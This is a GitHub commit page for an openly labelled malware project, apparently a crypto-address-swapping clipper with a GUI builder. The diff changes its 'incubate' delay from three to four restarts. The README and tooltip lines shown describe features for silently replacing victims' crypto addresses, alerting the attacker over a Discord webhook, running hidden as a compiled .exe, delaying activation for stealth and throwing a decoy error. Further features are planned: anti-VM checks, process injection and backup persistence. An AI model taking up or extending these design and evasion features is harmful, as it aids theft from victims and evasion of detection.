You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: README.md
+2-2Lines changed: 2 additions & 2 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -33,7 +33,7 @@ malware features
33
33
- allows discord webhook (whenever a address is detected you get a discord notification which says the computer name and that the address has been changed), doesnt need any installs as uses http.client rather than requests to send POST requests to webhook
34
34
- option to ping @everyone
35
35
- malware saved as .pyw and then compiled to .exe meaning that the malware runs in the background silently
36
-
- has a 3 restard incubate feature
36
+
- has a 4 restart incubate feature
37
37
- has a ignore feature (to not run on computers with a given computer name)
38
38
39
39
features i will want to add in the future
@@ -48,7 +48,7 @@ features i will want to add in the future
48
48
-[ ] anti virtual machine
49
49
-[ ] process injection???? - maybe on this one, no idea how it works
50
50
-[x] exclude - (exclude specific computer names and so on)
51
-
-[x] incubate (only starts running after a specific amount of restarts)
51
+
-[x] incubate (only starts running after 4 restarts)
52
52
-[ ] second file persistence (if the first persistent file is removed successfully the second one will run - will be stored separately from main persistence files)
CTkToolTip.CTkToolTip(widget=add_icon_btn, message="add icon: sets a custom icon to the .exe - defult is the normal .exe icon. if icons not showing press the fix icons button", wraplength=300)
CTkToolTip.CTkToolTip(widget=check_valid_btn, message="check valid: checks validity of crypto addresses and discord webhook", wraplength=300)
559
-
CTkToolTip.CTkToolTip(widget=incubate_checkbox, message="incubate: if enabled the code will not run until the computer is restarted 3 times, increases stealth, IF INCUBATE IS ENABLED FALSE ERROR WILL NEVER COME UP", wraplength=300)
559
+
CTkToolTip.CTkToolTip(widget=incubate_checkbox, message="incubate: if enabled the code will not run until the computer is restarted 4 times, increases stealth, IF INCUBATE IS ENABLED FALSE ERROR WILL NEVER COME UP", wraplength=300)
560
560
CTkToolTip.CTkToolTip(widget=false_error_checkbox, message="false error: if enabled the code will throw a false error to make it look like the code has crashed when it really is just a decoy (wont be installed in the peristant file). IF INCUBATE IS ENABLED FALSE ERROR WILL NEVER COME UP", wraplength=300)
0 commit comments